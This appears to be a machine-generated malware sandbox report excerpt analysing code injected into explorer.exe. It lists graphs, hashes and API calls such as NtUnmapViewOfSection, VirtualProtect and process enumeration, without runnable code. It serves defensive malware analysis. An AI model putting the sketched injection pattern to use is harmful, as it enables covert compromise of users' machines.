                                                                                                                          • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                                                                                                                          • API String ID: 377395780-613334611
                                                                                                                          • Opcode ID: cfce72b3618a7c47a9e65667863438cd17e088fed2e4d8986b934ffd60c6be69
                                                                                                                          • Instruction ID: f600240ef4a96efa131b933c508bbd1f37af75c9e0aeebf5a7652ade13498645
                                                                                                                          • Opcode Fuzzy Hash: cfce72b3618a7c47a9e65667863438cd17e088fed2e4d8986b934ffd60c6be69
                                                                                                                          • Instruction Fuzzy Hash: 6FF03762900128FAC71457D99C458FFB3FCEB0C742B00014AFE51D6180E6785A90D3B5

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:13.1%
                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:19
                                                                                                                          Total number of Limit Nodes:3
                                                                                                                          execution_graph 896 acb2be 897 acb2c2 896->897 899 acb458 897->899 900 acb4a8 897->900 901 acb4ad 900->901 902 acb595 LoadLibraryA 901->902 903 acb5f0 VirtualProtect VirtualProtect 901->903 906 acb5e5 901->906 902->901 905 acb67e 903->905 905->905 906->899 889 acb4a8 890 acb4ad 889->890 891 acb595 LoadLibraryA 890->891 892 acb5f0 VirtualProtect VirtualProtect 890->892 895 acb5e5 890->895 891->890 894 acb67e 892->894 894->894 907 acb358 908 acb35a 907->908 909 acb4a8 3 API calls 908->909 910 acb458 908->910 909->910

                                                                                                                          Callgraph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          • Opacity -> Relevance
                                                                                                                          • Disassembly available
                                                                                                                          callgraph 0 Function_00AC1CAC 1 Function_00AC20AC 22 Function_00AC1A88 1->22 2 Function_00AC2E2C 18 Function_00AC188C 2->18 52 Function_00AC1860 2->52 70 Function_00AC2DC0 2->70 3 Function_00AC31AC 5 Function_00AC25A8 3->5 12 Function_00AC1838 3->12 41 Function_00AC1B10 3->41 3->52 57 Function_00AC26F8 3->57 78 Function_00AC1D54 3->78 4 Function_00ACB4A8 50 Function_00ACB46A 4->50 31 Function_00AC2580 5->31 46 Function_00AC2768 5->46 80 Function_00AC18D0 5->80 6 Function_00AC1D24 7 Function_00AC27A0 8 Function_00AC1822 9 Function_00AC19BC 10 Function_00AC2FBC 10->2 11 Function_00ACB2BE 11->4 13 Function_00AC1938 13->12 13->52 14 Function_00AC24B8 14->12 14->52 62 Function_00AC20F4 14->62 15 Function_00ACAAB0 16 Function_00AC14B2 17 Function_00AC370C 17->3 17->12 17->17 44 Function_00AC1C6C 17->44 68 Function_00AC34C4 17->68 18->12 19 Function_00AC1F0C 20 Function_00ACAC8D 21 Function_00AC1508 23 Function_00AC5289 24 Function_00AC1D04 25 Function_00AC2A04 37 Function_00AC2918 25->37 25->44 69 Function_00AC27C4 25->69 26 Function_00AC1405 27 Function_00ACB007 28 Function_00ACAD00 29 Function_00AC1000 30 Function_00AC1F00 32 Function_00ACA881 33 Function_00ACAB9C 34 Function_00AC1E9C 35 Function_00AC1E1C 35->12 36 Function_00AC141D 38 Function_00AC3394 38->12 38->22 38->34 47 Function_00AC18E8 38->47 38->52 58 Function_00AC1EF8 38->58 38->80 39 Function_00AC2D14 39->12 39->14 39->35 39->47 39->52 40 Function_00AC4817 42 Function_00ACB291 43 Function_00AC156C 45 Function_00ACA8E8 46->7 48 Function_00AC3068 48->2 48->12 48->13 48->44 48->52 49 Function_00ACADEA 51 Function_00AC2664 52->44 53 Function_00AC1560 54 Function_00ACAFE3 55 Function_00AC1BF8 56 Function_00AC18F8 57->31 57->44 57->51 59 Function_00AC14F9 60 Function_00AC5579 61 Function_00AC1EFA 62->1 62->9 62->12 62->18 62->19 62->52 62->56 71 Function_00AC1FDC 62->71 62->80 63 Function_00ACAFF6 64 Function_00AC1576 65 Function_00AC1C4C 66 Function_00ACABCF 67 Function_00ACB148 68->0 68->6 68->9 68->12 68->22 68->24 68->25 68->38 68->44 68->52 68->55 68->65 70->12 71->12 71->56 72 Function_00ACB2DF 73 Function_00ACB358 73->4 74 Function_00AC3158 75 Function_00ACB15B 76 Function_00AC1254 77 Function_00AC14D4 79 Function_00ACABD7 81 Function_00ACAAD2

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 113 ac370c-ac371c call ac1c6c 116 ac37b0-ac37b5 113->116 117 ac3722-ac3754 call ac1838 113->117 121 ac3785-ac37aa NtUnmapViewOfSection 117->121 122 ac3756-ac375b call ac1838 117->122 126 ac37bc-ac37cb call ac34c4 121->126 127 ac37ac-ac37ae 121->127 124 ac3760-ac3779 122->124 124->121 132 ac37cd-ac37d0 call ac370c 126->132 133 ac37d5-ac37de 126->133 127->116 129 ac37b6-ac37bb call ac31ac 127->129 129->126 132->133
                                                                                                                          APIs
                                                                                                                          • NtUnmapViewOfSection.NTDLL ref: 00AC378C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001F.00000002.2534674582.0000000000AC1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AC1000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_31_2_ac1000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: SectionUnmapView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 498011366-0
                                                                                                                          • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                                          • Instruction ID: a62660d8606c5dc6a0f0864961087c61048e2983316e20ce18c631c2a007f4f8
                                                                                                                          • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                                          • Instruction Fuzzy Hash: 4711B2747019094FFF58FBB8989DB7533E1EB18312F55802DA815C72A2EE39CA918700

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00AC1BF8: OpenFileMappingA.KERNEL32 ref: 00AC1C0F
                                                                                                                            • Part of subcall function 00AC1BF8: MapViewOfFile.KERNELBASE ref: 00AC1C2E
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00AC35B7
                                                                                                                          • Process32First.KERNEL32 ref: 00AC35DA
                                                                                                                          • CharLowerA.USER32 ref: 00AC35EE
                                                                                                                          • Process32Next.KERNEL32 ref: 00AC36CD
                                                                                                                          • CloseHandle.KERNELBASE ref: 00AC36DE
                                                                                                                          • SysFreeMap.PGOCR ref: 00AC36F7
                                                                                                                          • SleepEx.KERNELBASE ref: 00AC3701
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001F.00000002.2534674582.0000000000AC1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AC1000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_31_2_ac1000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileProcess32$CharCloseCreateFirstFreeHandleLowerMappingNextOpenSleepSnapshotToolhelp32View
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2386764625-0
                                                                                                                          • Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                                          • Instruction ID: 29187b0d990a4ba7a4b67a5153df0369a621bee5c54b95e21958378aa888cc9d
                                                                                                                          • Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                                          • Instruction Fuzzy Hash: 0B51A631308A088FDB19FF28D999FAA73E1EB95310F45461DE45BC72A2DF38DA058781

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 54 acb4a8-acb4ab 55 acb4b5-acb4b9 54->55 56 acb4bb-acb4c3 55->56 57 acb4c5 55->57 56->57 58 acb4ad-acb4b3 57->58 59 acb4c7 57->59 58->55 60 acb4ca-acb4d1 59->60 62 acb4dd 60->62 63 acb4d3-acb4db 60->63 62->60 64 acb4df-acb4e2 62->64 63->62 65 acb4e4-acb4f2 64->65 66 acb4f7-acb504 64->66 67 acb52e-acb549 65->67 68 acb4f4-acb4f5 65->68 80 acb51e-acb52c call acb46a 66->80 81 acb506-acb508 66->81 69 acb57a-acb57d 67->69 68->66 71 acb57f-acb580 69->71 72 acb582-acb589 69->72 73 acb561-acb565 71->73 74 acb58f-acb593 72->74 78 acb54b-acb54e 73->78 79 acb567-acb56a 73->79 76 acb595-acb5ae LoadLibraryA 74->76 77 acb5f0-acb5f9 74->77 83 acb5af-acb5b6 76->83 87 acb5fc-acb605 77->87 78->72 84 acb550 78->84 79->72 85 acb56c-acb570 79->85 80->55 86 acb50b-acb512 81->86 83->74 91 acb5b8 83->91 92 acb551-acb555 84->92 85->92 93 acb572-acb579 85->93 101 acb51c 86->101 102 acb514-acb51a 86->102 88 acb62a-acb67a VirtualProtect * 2 87->88 89 acb607-acb609 87->89 97 acb67e-acb683 88->97 95 acb61c-acb628 89->95 96 acb60b-acb61a 89->96 98 acb5ba-acb5c2 91->98 99 acb5c4-acb5cc 91->99 92->73 100 acb557-acb559 92->100 93->69 95->96 96->87 97->97 103 acb685-acb694 97->103 104 acb5ce-acb5da 98->104 99->104 100->73 105 acb55b-acb55f 100->105 101->80 101->86 102->101 108 acb5dc-acb5e3 104->108 109 acb5e5-acb5ef 104->109 105->73 105->79 108->83
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 00ACB5A7
                                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00ACB651
                                                                                                                          • VirtualProtect.KERNELBASE ref: 00ACB66F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001F.00000002.2534674582.0000000000ACA000.00000040.80000000.00040000.00000000.sdmp, Offset: 00ACA000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_31_2_aca000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ProtectVirtual$LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 895956442-0
                                                                                                                          • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                                          • Instruction ID: a671c3faf825e95304c557a35c7880db94f9d001a9d321a57524edc61561d378
                                                                                                                          • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                                          • Instruction Fuzzy Hash: D6517A3177891D4BCB24AB789C82BF4B7D1F755325F19062EC49BC3285D76AC84683A1

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 110 ac1bf8-ac1c18 OpenFileMappingA 111 ac1c1a-ac1c38 MapViewOfFile 110->111 112 ac1c3b-ac1c48 110->112 111->112
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001F.00000002.2534674582.0000000000AC1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AC1000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_31_2_ac1000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$MappingOpenView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3439327939-0
                                                                                                                          • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                                          • Instruction ID: 02a629ecc7b4481a1600063ed2c05e0c50342d9d4224abfee090ed9ab2dcc41d
                                                                                                                          • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                                          • Instruction Fuzzy Hash: BFF01234318F4D4FAB45EF7C9C9C236B7E1EBA8202744857EA85AC6165EF34C8458711